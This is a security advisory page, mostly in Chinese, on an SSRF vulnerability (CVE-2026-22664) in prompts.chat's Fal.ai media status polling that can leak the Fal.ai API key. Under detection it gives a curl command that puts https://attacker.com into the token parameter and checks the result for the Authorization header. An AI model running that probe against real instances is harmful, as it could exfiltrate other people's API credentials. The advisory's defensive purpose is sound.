平台
nodejs
组件
prompts-chat
修复版本
30a8f0470e0ba45e6be9c9f55220f4a9a6b91c99
CVE-2026-22664 是 prompts.chat 中发现的服务器端请求伪造 (SSRF) 漏洞。该漏洞存在于 Fal.ai 媒体状态轮询功能中,攻击者可以通过构造恶意的 URL 参数来发起任意的外部请求。此漏洞影响 prompts.chat 的 0.0.0–30a8f0470e0ba45e6be9c9f55220f4a9a6b91c99 版本。已发布修复版本 30a8f0470e0ba45e6be9c9f55220f4a9a6b91c99。
攻击者可以利用此 SSRF 漏洞发起未经授权的外部请求,绕过内部网络安全措施。更严重的是,攻击者可以通过在 token 参数中注入恶意 URL,来泄露 Fal.ai API 密钥 (FALAPIKEY)。此密钥通常包含在 Authorization header 中,泄露后攻击者可以窃取凭证,对内部网络进行探测,并滥用受害者的 Fal.ai 帐户。这种攻击模式类似于其他 SSRF 漏洞,可能导致敏感信息泄露和系统被入侵。攻击者可以利用泄露的 API 密钥访问受害者的 Fal.ai 资源,甚至可能控制整个 Fal.ai 实例。
CVE-2026-22664 已于 2026 年 4 月 3 日公开披露。目前尚无公开的利用程序 (PoC),但由于 SSRF 漏洞的普遍性,存在被利用的风险。该漏洞尚未被添加到 CISA KEV 目录,但其 CVSS 评分为高,表明存在潜在的安全威胁。攻击者可能会利用此漏洞进行内部网络探测和凭证窃取。
Organizations utilizing prompts.chat for internal communication or AI-powered chatbot applications are at risk. Specifically, deployments that rely on Fal.ai for media processing or storage are particularly vulnerable. Shared hosting environments where multiple users share the same prompts.chat instance should be carefully assessed, as a compromised account could impact other users.
• nodejs / server: Monitor application logs for outbound requests to unusual or unexpected domains. Use lsof or netstat to identify processes making outbound connections to suspicious IP addresses or ports.
lsof -i | grep prompts.chat• generic web: Use curl to test the media status polling endpoint with a crafted URL containing a known malicious domain. Examine the response headers for any signs of credential leakage.
curl -v 'https://your-prompts-chat-instance/api/media_status?token=https://attacker.com' 2>&1 | grep Authorizationdisclosure
漏洞利用状态
EPSS
0.03% (9% 百分位)
CISA SSVC
为了缓解 CVE-2026-22664 的风险,建议立即升级到修复版本 30a8f0470e0ba45e6be9c9f55220f4a9a6b91c99。如果无法立即升级,可以考虑以下临时缓解措施:首先,实施严格的 URL 验证,确保 Fal.ai 媒体状态轮询只允许访问受信任的域名。其次,限制 prompts.chat 应用程序的网络访问权限,防止其访问敏感的内部资源。最后,监控 Fal.ai API 密钥的泄露情况,并定期轮换密钥。升级后,验证 API 密钥是否仍然安全,并检查是否有任何未经授权的访问记录。
将 prompts.chat 更新到包含提交 30a8f0470e0ba45e6be9c9f55220f4a9a6b91c99 的版本。此修复程序在 Fal.ai 媒体状态轮询期间验证 token 参数中提供的 URL,从而缓解 SSRF 漏洞。
漏洞分析和关键警报直接发送到您的邮箱。
CVE-2026-22664 是 prompts.chat 中发现的服务器端请求伪造 (SSRF) 漏洞,允许攻击者发起未经授权的外部请求,并可能泄露敏感信息。
如果您正在使用 prompts.chat 的 0.0.0–30a8f0470e0ba45e6be9c9f55220f4a9a6b91c99 版本,则可能受到影响。请立即升级到修复版本。
建议立即升级到修复版本 30a8f0470e0ba45e6be9c9f55220f4a9a6b91c99。如果无法升级,请实施 URL 验证和限制网络访问权限。
目前尚无公开的利用程序,但由于 SSRF 漏洞的普遍性,存在被利用的风险。
请查阅 prompts.chat 官方安全公告,以获取有关此漏洞的更多信息和修复指南。
CVSS 向量